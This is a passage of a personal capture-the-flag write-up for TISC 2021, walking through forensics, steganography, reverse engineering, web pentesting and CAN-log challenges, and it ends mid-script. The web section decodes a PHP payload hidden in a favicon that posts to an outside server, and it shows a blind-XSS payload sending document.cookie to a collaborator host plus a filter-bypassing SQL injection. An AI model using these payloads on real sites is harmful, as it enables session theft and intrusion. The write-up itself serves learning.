decoded = ''.join(chr(int(char, 2)) for char in string_blocks)
print(decoded[0:500])
wav.close()
Slightly panicking at this simple challenge, I returned to the “secret channel” hint. I separated each audio channel from the file with a command from Stack Overflow: ffmpeg -i file1.wav -map_channel 0.0.0 ch0.wav -map_channel 0.0.1 ch1.wav
. I played ch1.wav
and instead of funky music, I heard a series of beeps – Morse code! I used an online Morse Code audio decoder and got the flag.
TISC{csitislocatedinsciencepark}
Part 2
Domains: Forensics
This is a generic picture. What is the modify time of this photograph?
Submit your flag in the following format: TISC{YYYY:MM:DD HH:MM:SS}
file2.jpg
exiftool
solved this in no time.
TISC{2021:10:30 03:40:49}
Part 3
Domains: Forensics, Cryptography
Nothing unusual about the Singapore logo right?
Submit your flag in the following format: TISC{ANSWER}
file3.jpg
The first appearance of the cryptography domain! I opened the file in the 010 Editor hex editor which highlighted an anomalous data blob at the end of the file.
The PK
magic bytes identified this blob as a zip file. I extracted it with binwalk -e file3.jpg
which revealed another image file picture_with_text.jpg
. I opened it in 010 Editor and spotted some garbage bytes at the start of the file.
NAFJRE GB GUVF PUNYYRATR VF URER NCCYRPNEEBGCRNE
looked like a simple text cipher. I popped into CyberChef and quickly discovered that it was ROT13 “encryption”.
TISC{APPLECARROTPEAR}
Part 4
Domains: Forensics
Excellent! Now that you have show your capabilities, CSIT SOC team have given you an .OVA virtual image in investigating a snapshot of a machine that has been compromised by PALINDROME. What can you uncover from the image?
Once you download the VM, use this free flag TISC{Yes, I've got this.} to unlock challenge 4 – 10.
https://transfer.ttyusb.dev/I6aQoOSuUuAoIIaqMWWkCcKyOk/windows10.ova
Check MD5 hash: c5b401cce9a07a37a6571ebe5d4c0a48
For guide on how to import the ova file into VirtualBox, please follow the VM importing guide attached.
Please download and install Virtualbox ver 6.1.26 instead of ver 6.1.28, as there has been reports of errors when trying to install the Win 10 VM image.
This challenge contained six flags but no rollercoasters. I naively imported the VM into Virtualbox and got to work.
What is the name of the user?
Submit your flag in the format: TISC{name}.
What is whoami
?
TISC{adam}
Which time was the user's most recent logon? Convert it UTC before submitting.
Submit your flag in the UTC format: TISC{DD/MM/YYYY HH:MM:SS}.
I experienced my first facepalm moment of the competition (there would be many more to come). The most recent logon time got reset after I logged into the VM, so it was time to download Autopsy.
After Autopsy imported and processed the OVA file, I found the most recent logon time under OS Accounts > adam
> Last Login and converted the timezone to UTC.
TISC{17/06/2021 02:41:37}
.
A 7z archive was deleted, what is the value of the file CRC32 hash that is inside the 7z archive?
Submit your flag in this format: TISC{CRC32 hash in upper case}.
I found the deleted archive at Data Artifacts > Recycle Bin and generated the CRC32 hash with 7-Zip.
TISC{040E23DA}
Question1: How many users have an RID of 1000 or above on the machine?
Question2: What is the account name for RID of 501?
Question3: What is the account name for RID of 503?
Submit your flag in this format: TISC{Answer1-Answer2-Answer3}. Use the same case for the Answers as you found them.
I got all of the answers under OS Accounts although I was briefly confused by the system users.
TISC{1-Guest-DefaultAccount}
Question1: How many times did the user visit https://www.csit.gov.sg/about-csit/who-we-are ?
Question2: How many times did the user visit https://www.facebook.com ?
Question3: How many times did the user visit https://www.live.com ?
Submit your flag in this format: TISC{ANSWER1-ANSWER2-ANSWER3}.
Data Artifacts > Web History
TISC{2-0-0}
A device with the drive letter “Z” was connected as a shared folder in VirtualBox. What was the label of the volume? Perhaps the registry can tell us the “connected” drive?
Submit your flag in this format: TISC{label of volume}.
I found this a little difficult. I resorted to adding another shared folder to the VM then searching for the label name in Registry Editor to figure out which registry key controlled the volume labels. This led me to the registry path Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
which contained all the volume labels.
TISC{vm-shared}
A file with SHA1 0D97DBDBA2D35C37F434538E4DFAA06FCCC18A13 is in the VM… somewhere. What is the original name of the file that is of interest?
Submit your flag in this format: TISC{original name of file with correct file extension}.
Since Autopsy only supported SHA256 and MD5 hashes, I resorted to guessing that it was one of the files under Data Artifacts > Recent Documents. I extracted all of them and ran Get-FileHash -Algorithm SHA1 *
. otter-singapore.lnk
, which used to point to otter-singapore.jpg
, matched the SHA1 hash.
TISC{otter-singapore.jpg}
Level 2: Dee Na Saw as a need
Domain: Network Forensics
We have detected and captured a stream of anomalous DNS network traffic sent out from one of the PALINDROME compromised servers. None of the domain names found are active. Either PALINDROME had shut them down or there's more to it than it seems.
This level contains 2 flags and both flags can be found independently from the same pcap file as attached here.
Flag 1 will be in this format, TISC{16 characters}.
Flag 2 will be in this format, TISC{17 characters}.
traffic.pcap
As a newbie to steganography, I felt that this level was the most “CTF-y” and actually got stuck for two days hunting flag 1 and ragequit for a while. Fortunately, I managed to get it after cooling off.
Flag 2
traffic.pcap
consisted of a short series of DNS query responses.
A few anomalies stood out to me:
- The domain names clearly contained some kind of exfiltration data and matched the format
d33d<9 hex chars>.toptenspot.net
. - The Time to Live (TTL) values constantly changed, which should not be the case with a typical DNS server.
- The serial numbers also kept changing.
For the domain names, I noticed that the first two hex chars were always numeric e.g. 10
, 11
, 12
. I extracted the hex chars with scapy
and tried hex-decoding them but it only produced gibberish. After fiddling around with a few variations such as XORing consecutive bytes, I came across this CTF writeup that described Base32 encoding of data in DNS query names. Base32 encoding used a similar charset as hex numbers. I tried Base32 decoding the “hex chars” with CyberChef and immediately spotted a few interesting outputs such as <NON-ASCII CHARS>ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghij
. After playing around with the offsets, I realised that the first two (numeric) characters were bad bytes, while the rest of the characters made up a valid base32 string.
I automated the decoding routine with a quick script.
from scapy.all import *
from scapy.layers.dns import DNS
import base64
dns_packets = rdpcap('traffic.pcap')
encoded = ''
for packet in dns_packets:
if packet.haslayer(DNS):
encoded += packet[DNS].qd.qname[6:13].decode('utf-8')
decoded = base64.b32decode(encoded[:-(len(encoded) % 8)]).decode('utf-8')
print(decoded)
This produced a bunch of lorem ipsum text along with the second flag.
TISC{n3vEr_0dd_0r_Ev3n}
Flag 1
With the first anomalous property solved, I focused on the TTLs and serial numbers, wasting many hours chasing what eventually turned out to be red herring. The TTLs and serial numbers generally matched a pattern – Serial number + TTL = unix timestamp
– that made it seem like I was on the right path. After many fruitless hours spent mutating these values in increasingly insane permutations, I gave up and took my break.
When I returned, I went back to basics and considered the numeric “bad bytes” from the DNS domain names. I decided to check the range of these values. They went from 01
to 64
... could it be? I transposed the numbers to the base64 alphabet, then base64-decoded them... yep, it was a DOCX file.
Pictured below is the moment the challenge creator thought of the TTL red herring.
Moving on, I extracted the DOCX file with scapy
.
from scapy.all import *
from scapy.layers.dns import DNS
import base64
dns_packets = rdpcap('traffic.pcap')
alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
encoded = ''
for packet in dns_packets:
if packet.haslayer(DNS):
encoded += alphabet[int(packet[DNS].qd.qname[4:6].decode('utf-8'))-1]
decoded = base64.b64decode(encoded + '==')
file = open('output.docx', 'wb')
file.write(decoded)
file.close()
The word document contained the pretty obvious clue now you see me, what you seek is within
. Since DOCX files are actually ZIP files in disguise, I unzipped the DOCX and grepped the files for the flag format TISC{
. I found what I was looking for in word/theme/theme1.xml
.
TISC{1iv3_n0t_0n_3vi1}
Level 3: Needle in a Greystack
Domains: Reverse Engineering
An attack was detected on an internal network that blocked off all types of executable files. How did this happen?
Upon further investigations, we recovered these 2 grey-scale images. What could they be?
1.bmp
2.bmp
I opened both files in 010 Editor and noticed that both 1.bmp
and 2.bmp
embedded data in the BMP pixel colour bytes in reverse order. 1.bmp
contained a Windows executable while 2.bmp
contained simple ASCII text.
I extracted them with a simple Python script.
with open("1.bmp", "rb") as bmp_1, open("1.exe", "wb") as out_file:
data = bmp_1.read()
output = data[-148:][:-3]
for i in range(1, 145):
output += data[-((i + 1) * 148):-(i * 148)][:-3]
out_file.write(output)
with open("2.bmp", "rb") as bmp_1, open("2.txt", "wb") as out_file:
data = bmp_1.read()
output = data[-100:][:-1]
for i in range(1, 99):
output += data[-((i + 1) * 100):-(i * 100)][:-1]
out_file.write(output)
Running 1.exe
, I received the following output:
> .\1.exe
HELLO WORLD
flag{THIS_IS_NOT_A_FLAG}
Digging deeper, I decompiled the executable with IDA and noticed that the main
function checked for a .txt
file in the first argument.
puts("HELLO WORLD");
if ( argc < 2 )
goto LABEL_34;
v3 = argv[1];
v4 = strrchr(v3, 46);
if ( !v4 || v4 == v3 )
v5 = (const char *)&unk_40575A;
else
v5 = v4 + 1;
v6 = strcmp("txt", v5);
if ( v6 )
v6 = v6 < 0 ? -1 : 1;
if ( v6 )
{
LABEL_34:
puts("flag{THIS_IS_NOT_A_FLAG}");
return 1;
}
fopen_s(&Stream, argv[1], "rb");
v7 = (void (__cdecl *)(FILE *, int, int))fseek;
if ( Stream )
{
fseek(Stream, 0, 2);
v8 = ftell(Stream);
v23 = v8 >> 31;
v24 = v8;
fclose(Stream);
}
I tested this with a random text file, which yielded the following output.
> .\1.exe .\2.txt
HELLO WORLD
Almost There!!
Looking further down the pseudocode for main
, I noticed that it called a function that VirtualAlloc
ed some memory, copied data into it, then ran LoadLibraryA
. Since Almost There!!
did not appear as a string in 1.exe
, I suspected that it came from the dynamically loaded library.
I set a breakpoint at the memcpy
and ran the IDA debugger. Checking the arguments to memcpy
at the breakpoint, I confirmed that it copied an executable file that included the magic bytes MZ
followed by This program cannot be run in DOS mode
.
Now I needed to dump this data. I manually figured out the size of the file by checking for the Application Manifest XML text that appeared at the end of the source buffer. Next, I dumped it in WinDBG with .writemem b.exe ebx L2600
.
The executable turned out to be a DLL that contained the decoding routine in the dllmain_dispatch
function, which was executed every time 1.exe
loaded it with LoadLibraryA
.
The DLL decompiled to pseudocode which I identified as the RC4 key-scheduling algorithm (KSA) due to the 256-iteration loop.
if ( Block )
{
v4 = strcmp(Block, "Words of the wise may open many locks in life.");
if ( v4 )
v4 = v4 < 0 ? -1 : 1;
if ( !v4 )
puts("*Wink wink*");
}
memset(v18, 0, 0xFFu);
for ( i = 0; i < 256; ++i ) // RC4 Key Scheduling Algorithm
*((_BYTE *)&Stream[1] + i) = i;
v6 = 0;
Stream[0] = 0;
do
{
v7 = *((_BYTE *)&Stream[1] + v6);
v8 = (FILE *)(unsigned __int8)(LOBYTE(Stream[0]) + Block[v6 % 0xEu] + v7);
Stream[0] = v8;
*((_BYTE *)&Stream[1] + v6++) = *((_BYTE *)&Stream[1] + (_DWORD)v8);
*((_BYTE *)&Stream[1] + (_DWORD)v8) = v7;
}
The pseudocode contained two more important tidbits of information. Firstly, “Words of the wise may open many locks in life” looked like a hint. Secondly, The KSA loop used 0xE as the modulus, telling me that the RC4 key was 14 bytes long.
At first, I fell down a rabbit hole trying to guess the key. Given the name of the challenge and Words of the wise
, I thought it had something to do with Gandalf from Lord of the Rings and tried all kinds of phrases associated with him, including youwillnotpass
. After a long time, I returned to my senses and realised that the key probably existed in the second file I had extracted earlier. It contained a huge list of words, including rubywise
– this was probably what the “Words of the wise” hint was referring to.
I brute forced the keys with a quick Python script.
import subprocess
import os
with open('keys.txt') as file:
lines = file.readlines()
lines = [line.rstrip() for line in lines]
for line in lines:
with open('key.txt', 'w') as key:
key.write(line)
result = subprocess.run([".\\1.exe", ".\\2.txt"], capture_output=True).stdout
if b'TISC' in result:
print(line)
print(result)
TISC{21232f297a57a5a743894a0e4a801fc3}
Level 4: The Magician's Den
Domains: Web Pentesting
One day, the admin of Apple Story Pte Ltd received an anonymous email.
===
Dear admins of Apple Story,
We are PALINDROME.
We have took control over your system and stolen your secret formula!
Do not fear for we are only after the money.
Pay us our demand and we will be gone.
For starters, we have denied all controls from you.
We demand a ransom of 1 BTC to be sent to 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2 by 31 dec 2021.
Do not contact the police or seek for help.
Failure to do so and the plant is gone.
We planted a monitoring kit so do not test us.
Remember 1 BTC by 31 dec 2021 and we will be gone.
Muahahahaha.
Regards,
PALINDROME
===
Management have just one instruction. Retrieve the encryption key before the deadline and solve this.
http://wp6p6avs8yncf6wuvdwnpq8lfdhyjjds.ctf.sg:14719
Note: Payloads uploaded will be deleted every 30 minutes.
Finally, a web challenge! The website featured a ransom note and a link to a payment page.
The challenge came with a free hint: “What are some iconic techniques that the actor PALINDROME mimicked Magecart to evade detection?” Based on this, I researched Magecart's tactics, techniques, and procedures (TTPs) and found out that the threat actor hid malicious payloads in image files. I checked each of the loaded images and noticed that favicon.ico
contained the following PHP code: eval(base64_decode('JGNoPWN1cmxfaW5pdCgpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1VSTCwiaHR0cDovL3MwcHE2c2xmYXVud2J0bXlzZzYyeXptb2RkYXc3cHBqLmN0Zi5zZzoxODkyNi94Y3Zsb3N4Z2J0ZmNvZm92eXdieGRhd3JlZ2pienF0YS5waHAiKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9QT1NULDEpO2N1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX1BPU1RGSUVMRFMsIjE0YzRiMDZiODI0ZWM1OTMyMzkzNjI1MTdmNTM4YjI5PUhpJTIwZnJvbSUyMHNjYWRhIik7JHNlcnZlcl9vdXRwdXQ9Y3VybF9leGVjKCRjaCk7'));
. The base64 string decoded to:
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,"http://<DOMAIN>:18926/xcvlosxgbtfcofovywbxdawregjbzqta.php");
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"14c4b06b824ec593239362517f538b29=Hi%20from%20scada");
$server_output=curl_exec($ch);
This PHP code sent the following HTTP request:
POST /xcvlosxgbtfcofovywbxdawregjbzqta.php HTTP/1.1
Host: <DOMAIN>:18926
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
14c4b06b824ec593239362517f538b29=Hi%20from%20scada
Which returned the following response:
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2021 05:50:11 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.2.2
Vary: Accept-Encoding
Content-Length: 77
Connection: close
Content-Type: text/html; charset=UTF-8
New record created successfully in data/9bcd278b611772b366155e078d529145.html
The server created a HTML file from my input. I did a quick check for SQL injection (nothing), then moved on the next most likely vulnerability – a blind cross-site scripting (XSS) attack. Instead of Hi%20from%20scada
, I entered <img src="http://zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net" />
. After a few minutes, I got a pingback!
GET / HTTP/1.1
Referer: http://magicians-den-web/data/9bcd278b611772b366155e078d529145.html
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en,*
Host: zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net
I also realised that the PHP code sent the POST request to a different website at http://<DOMAIN>:18926/
. The website included a “Latest sample data” page containing the HTML files created by the POST request, which helped me debug my payloads.
Usually, XSS CTF challenges featured data exfiltration via the victim's browser. At first, I suspected that because the victim's User Agent PhantomJS/2.1.1
suffered from a known local file disclosure vulnerability, I was meant to leak /etc/passwd
. However, after multiple attempts, I got nowhere, probably because the vicitm accessed the XSS payload from a http://
URL rather than a file://
URI that could bypass Cross-Origin Resource Sharing (CORS) protections.
Going back to the drawing board, I decided to perform some directory busting with ffuf
and discovered that a login page existed at http://<DOMAIN>:18926/login.php
.
Unfortunately, the signup was disabled, but since the PHPSESSID
cookie controlled the user's session, I found the way forward: I needed to leak the admin's session cookie using the blind XSS. I modified my payload to <script>document.body.appendChild(document.createElement("img")).src='http://zdgrxeldiyxju6mmytt0cdx3muskg9.burpcollaborator.net?'%2bdocument.cookie</script>
and received a pingback at /?PHPSESSID=64f15ffeb7a191812bddfb9a855e0ffb
.
After adding the session cookie, I browsed to the login page and got redirected to http://<DOMAIN>:18926/landing_admin.php
.
The page listed actions taken by targets and allowed me to filter the results by isALIVE
or isDEAD
. When I changed the filter, the page sent the following HTTP request:
POST /landing_admin.php HTTP/1.1
Host: <DOMAIN>:18926
Content-Length: 14
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<DOMAIN>:18926
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://<DOMAIN>:18926/landing_admin.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=e9b94a5a71d62d9171130ad5890f38ef
Connection: close
filter=isALIVE
Other than the filtered actions, the response included the text Filter applied: <VALUE OF FILTER PARAM>
. Switching to the isDEAD
filter returned the actions MaybeMessingAroundTheFilterWillHelp?
and ButDoYouKnowHow?
, hinting at an SQL injection.
I confirmed that the POST /landing_admin.php
request was vulnerable to SQL injection using isomorphic SQL statements; adding a simple '
to filter=isALIVE
caused the server to omit the Filter applied
message and adding ''
restored it. However, jumping straight to ' OR '1'='1
failed. Puzzled, I continued testing several payloads and eventually noticed that certain characters were sanitized because they never appeared in the Filter applied
message. By fuzzing all possible URL-encoded ASCII characters, I reconstructed the blacklist !"$%&*+,-./:;<=>?@[]^_`{|}~
, which only left the special characters #'()
. Additionally, I found out that any filter
parameter longer than 7 characters always failed.
Since the injected SQL statement probably looked something like SELECT * from actions WHERE status='<PAYLOAD>'
, I reasoned that one possible valid payload was 'OR(1)#
, creating the final statement SELECT * from actions WHERE status=''OR(1)#'
. This neatly dumped all possible actions while commenting out the extra '
. Thankfully, the payload worked and the response included the flag as one of the actions.
TISC{H0P3_YOu_eNJ0Y-1t}
Level 5: Need for Speed
Domains: Binary Manipulation, IoT Analytics
We have intercepted some instructions sent to an autonomous bomb truck used by PALINDROME. However, it seems to be just a BMP file of a route to the Istana!
Analyze the file provided and uncover PALINDROME's instructions. Find a way to kill the operation before it is too late.
Ensure the md5 checksum of the given file matches the following before starting: 26dc6d1a8659594cdd6e504327c55799
Submit your flag in the format: TISC{flag found}.
Note: The flag found in this challenge is not in the TISC{...} format. To assist in verifying if you have obtained the flag, the md5 checksum of the flag is: d6808584f9f72d12096a9ca865924799.
ATTACHED FILES
route.bmp
This steganography challenge stumped many participants. On the surface, route.bmp
looked like a simple screenshot of a map.
Using stegsolve
, I noticed interesting outputs when I applied the plane 0 filter on either red, green, or blue values.
The top half of the image resembled static instead of the expected black and white outline of the original image. While researching more image steganography techniques, I came across another CTF writeup which featured a similar “static” generated by stegsolve
. The writeup described how the image hid the data in the least significant bytes of each pixel's RGB values. I applied the script from the writeup to extract the data but encountered a slight corruption. Although the first few bytes 37 7A C2 BC C2 AF 27 1C
almost matched the magic bytes of a 7-Zip file 37 7A BC AF 27 1C
, the extra C2
bytes got in the way of a proper decoding.
I decided to compare the expected binary output against the real output of the script.
Expected: 00110111 01111010 10111100 10101111 00100111 00011100 # 37 7A BC AF 27 1C
Real: 00110111001111011010001011100010000111101011010011100 # 37 3d a2 e2 1e b4 1c
After reading the writeup closely, I realised that the script correctly skipped every 9th bit but converted the bits to bytes too early. I fixed this bug to get a working decoder.
##!/usr/bin/env python
from PIL import Image
import sys
## Trim every 9th bit
def trim_bit_9(b):
trimmed = ''
while len(b) != 0:
trimmed += b[:8]
b = b[9:]
return trimmed
## Load image data
img = Image.open(sys.argv[1])
w,h = img.size
pixels = img.load()
binary = ''
for y in range(h):
for x in range(w):
# Pull out the LSBs of this pixel in RGB order
binary += ''.join([str(n & 1) for n in pixels[x, y]])
trimmed = trim_bit_9(binary)
with open('out.7z', 'wb') as file:
file.write(bytes(int(trimmed[i : i + 8], 2) for i in range(0, len(trimmed), 8)))
The extracted 7-Zip file contained two files: update.log
and candump.log
.
updated.log
contained the following text:
see turn signals for updated abort code :)
- P4lindr0me
Meanwhile, candump.log
was a huge file that contained lines like this:
(1623740188.969099) vcan0 136#000200000000002A
(1623740188.969107) vcan0 13A#0000000000000028
(1623740188.969109) vcan0 13F#000000050000002E
(1623740188.969112) vcan0 17C#0000000010000021
(1623740225.790964) vcan0 324#7465000000000E1A
(1623740225.790966) vcan0 37C#FD00FD00097F001A
(1623740225.790968) vcan0 039#0039
(1623740225.792217) vcan0 183#0000000C0000102D
(1623740225.792231) vcan0 143#6B6B00E0
(1623740225.794607) vcan0 095#800007F400000017
What was I looking at? After a bit of Googling, I found out that candump
was a tool to dump Controller Area Network (CAN) bus traffic. CAN itself was a network protocol used by vehicles. By searching for some of the lines in candump.log
, I discovered a sample CAN log generated by ICSim. After doing some more research on the CAN protocol, I deduced that each line in the CAN dump matched the format (<TIMESTAMP>) <INTERFACE> <CAN INSTRUCTION ID>#<CAN INSTRUCTION DATA>
.
Based on the “see turn signals” clue, I needed to find the CAN instruction ID that matched the “turn signal” instruction. The CAN instruction data for turn signals probably contained the flag. I reviewed the source code of ICSim and saw that ICSim set the turn signal ID to either a default constant or some randomised value:
##define DEFAULT_SIGNAL_ID 392 // 0x188
...
signal_id = DEFAULT_SIGNAL_ID;
speed_id = DEFAULT_SPEED_ID;
if (randomize || seed) {
if(randomize) seed = time(NULL);
srand(seed);
door_id = (rand() % 2046) + 1;
signal_id = (rand() % 2046) + 1;
Sadly, since none of the CAN dump lines contained the 188
instruction ID, I knew that the turn signal instruction ID had been randomised.
Based on the code and an ICSim tutorial, I also knew that the data values for the turn signal instruction could be 00
(both off), 01
(left on only), 02
(right on only), or 03
(both on). As such, I attempted to filter out all CAN instruction IDs that had at most 4 unique data values in candump.log
. The instruction ID 40C
looked promising because it only had the following unique data values: 40C: ['0000000004000013', '014A484D46413325', '0236323239533039', '033133383439000D']
. However, despite spending hours hex-decoding the values, XORing them, and so on, I failed to retrieve any usable data.
After wasting many time on this rabbit hole, I re-read the source code for sending a turn signal on ICSim.
void send_turn_signal() {
memset(&cf, 0, sizeof(cf));
cf.can_id = signal_id;
cf.len = signal_len;
cf.data[signal_pos] = signal_state;
if(signal_pos) randomize_pkt(0, signal_pos);
if(signal_len != signal_pos + 1) randomize_pkt(signal_pos+1, signal_len);
send_pkt(CAN_MTU);
}
I noticed my mistake: the send_turn_signal
function set only one byte in the CAN message data to the signal state byte, then randomised the rest of the data bytes. This meant that the turn signals would have far more than four possible unique data values! Instead, I should have filtered the CAN dump for turn signal IDs whose data values always included either 00
, 01
, 02
, and 03
in a fixed position. I quick wrote a new script to do this.
can_combinations = dict()
can_count = dict()
with open('candump.log', 'r') as file:
while line := file.readline():
can_id = line[26:29]
can_data = line[30:].strip()
if can_id not in can_combinations:
can_combinations[can_id] = [can_data]
else:
if can_data not in can_combinations[can_id]:
can_combinations[can_id].append(can_data)
if can_id not in can_count:
can_count[can_id] = 1
else:
can_count[can_id] += 1
for can_id in can_combinations:
if all(('01' in data or '02' in data or '03' in data or '00' in data) for data in can_combinations[can_id]):
print("{} {}: {}".format(can_id, can_count[can_id], can_combinations[can_id]))
Out of the possible filtered CAN IDs, 0C7
also looked promising because some of the data values contained ASCII characters when hex-decoded.
0C7: ['00006c88000000', '0E003100000011', '00006664000000', '00003369000066', '00E75f00D30000', '3A0931E20000E0', '07003500000000', '00005fA1000038', '00007782600000', '3521683F00016C', '00003400000005', '00003700000100', '4F005f00000000', '00006802000100', '00003483000000', 'B900702D000100', '00007006000000', '00B63300000117', 'F8786e000C00D6', '0092359B000100', '90005f77F80000', 'B3457700000100', '00006800000030', 'C9F13300AA0100', '00B56e00000000', '00005f98AB0186', '770079003800D0', '0000305D000100', 'F3427500000064', '00002700000100', 'A0007200460032', '00003312000100', 'C2005f000000E2', '00006200790100', '00007500000000', '00003500000000', '004A7900000000', '00005f00000000', '00006d33000000', '000034000000BF', '00136b0000005C', '00F63100000000', '00006e00AA0099', '15003600000000', '7B005fD6000000', 'BC003020000000', 'B7003700000000', '0000680000006C', '00003300310000', '50007200A50000', '00005f00A60000', '00E67000A200A2', '77006c00450059', '89003400000000', '59006e2AE500D1', '00E23500F80000', '00912eC2B40000', '00002d00000100', '003E6a007B0060', '00005f00F70132', '0000304F000000', '00FB5f00000100', '44576800000000', '00005f00000193', 'FD006eDE450000', '00895f00900100', '00006c00910000', '00005fDDD10000', '00003300000200', '00CA5f00CC0000', 'E4FB6e00000000', '00005f00770000', '00006e00000000', '00005f00810000', '00003049940000', '00F95f003600D4', '6E7B6e936C0051']
After a lot of manual copying and pasting, I found that these ASCII characters appeared in the third byte of each instruction's data. Based on this hunch, I wrote another short script to extract and decode these bytes.
can_combinations = dict()
can_count = dict()
encoded = ''
with open('candump.log', 'r') as file:
while line := file.readline():
can_id = line[26:29]
can_data = line[30:].strip()
if can_id == '0C7':
encoded += can_data[4:6]
print(bytes.fromhex(encoded).decode('utf-8'))
This produced l1f3_15_wh47_h4pp3n5_wh3n_y0u'r3_bu5y_m4k1n6_07h3r_pl4n5.-j_0_h_n_l_3_n_n_0_n
which matched the checksum d6808584f9f72d12096a9ca865924799
.
TISC{l1f3_15_wh47_h4pp3n5_wh3n_y0u'r3_bu5y_m4k1n6_07h3r_pl4n5.-j_0_h_n_l_3_n_n_0_n}
Level 6: Knock Knock, Who's There
Domains: Network Forensics, Reverse Engineering
Traffic capture suggests that a server used to store OTP passwords for PALINDROME has been found. Decipher the packets and figure out a way to get in. Move quick, time is of essence.
https://transfer.ttyusb.dev/s4is2/traffic_capture.pcapng
Server at 128.199.211.243
Note: The challenge instance may be reset periodically so do save a copy of any files you might need on your machine.
I was halfway there, but I faced the most mind-bending level yet. I downloaded the massive 614 MB PCAP file containing all kinds of traffic, including SSH, SMB, HTTP, and more. Based on the title of the level and “time is of essence” in the description, I suspected that the challenge involved port knocking. I needed to discover the port knocking sequence needle in the haystack and thereafter use it to access the server at 128.199.211.243
. I ran a full nmap scan of the server which returned zero ports – another strong hint that port knocking was the solution.
To start off, I scanned the PCAP with VirusTotal and Suricata, both of which flagged malicious traffic.
08/26/2021-19:47:30.560000 [**] [1:2008705:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (15) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
08/26/2021-19:47:30.560000 [**] [1:2008715:5] ET NETBIOS Microsoft Windows NETAPI Stack Overflow Inbound - MS08-067 (25) [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
08/26/2021-19:47:30.560000 [**] [1:2009247:3] ET SHELLCODE Rothenburg Shellcode [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 192.168.202.68:40111 -> 192.168.23.100:445
At first, I thought I had to extract the binaries sent by the malicious traffic and reverse engineer them, similar to last year's Flare-On Challenge 7. This sent me down a deep, dark rabbit hole in which I attempted to reverse engineer Meterpreter traffic and other payloads. After wasting many hours on reverse engineering, I went back to the port knocking idea. One CTF blogpost suggested that I could use the WireShark filter (tcp.flags.reset eq 1) && (tcp.flags.ack eq 1)
to retrieve port knocking sequences. However, this approach failed because in the author's case, the knocked ports responded with a RST, ACK
packet whereas for this challenge the knocked ports were completely filtered.
Growing desperate, I noticed that some of the HTTP traffic contained references to the U.S. National CyberWatch Mid-Atlantic Collegiate Cyber Defense Competition (MACCDC) 2012. For example, Network Miner extracted a file named attackerHome.php
that included this HTML code:
<select id='eventSelect' name='eventId'>
<option value=''>Select an Event...</option>
<option value='1' >Mid-Atlantic CCDC 2011</option>
<option value='21' >Cyberlympics - Miami</option>
<option value='30' >Mid-Atlantic CCDC 2012</option>
</select>
Following this lead, I found out that traffic captures for MACCDC 2012 were available online as PCAP files. However, for 2012 alone, the organisers released 16 different PCAP files, each several hundred MBs in size.
With no better ideas, I downloaded every single MACCDC 2012 PCAP file and manually checked each one for matching packets in traffic_capture.pcapng
. After several painfully large downloads, I narrowed it down to maccdc2012_00013.pcap
.
Next, I used a PCAP diffing script to extract unique packets in traffic_capture.pcapng
that did not appear in maccdc2012_00013.pcap
. Parsing the two massive files took about half an hour but I got my answer: traffic_capture.pcapng
included extra HTTP traffic between 192.168.242.111
and 192.168.24.253
.
GET /debug.txt HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 192.168.57.130:21212
Connection: Keep-Alive
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 24 Aug 2021 07:48:38 GMT
Content-type: text/plain
Content-Length: 138
Last-Modified: Tue, 24 Aug 2021 07:43:39 GMT
DEBUG PURPOSES ONLY. CLOSE AFTER USE.
++++++++
5 ports.
++++++++
Account.
++++++++
SSH.
++++++++
End debug. Check and re-enable firewall.
Two things stood out to me. Firstly, the HTTP response suggested that there were 5 ports in the port knocking sequence to open the SSH port. Secondly, the host header 192.168.57.130:21212
did not match the HTTP server IP 192.168.24.253
. Perhaps this was a hint about the ports?
I attempted multiple permutations of 192
, 168
, 57
, 130
, and 21212
using a port knocking script to no avail. After several more hours sunk into this rabbit hole, I resorted to writing my own diffing script because I realised that the previous PCAP diffing script missed out some packets.
from scapy.all import PcapReader, wrpcap, Packet, NoPayload, TCP
i = 0
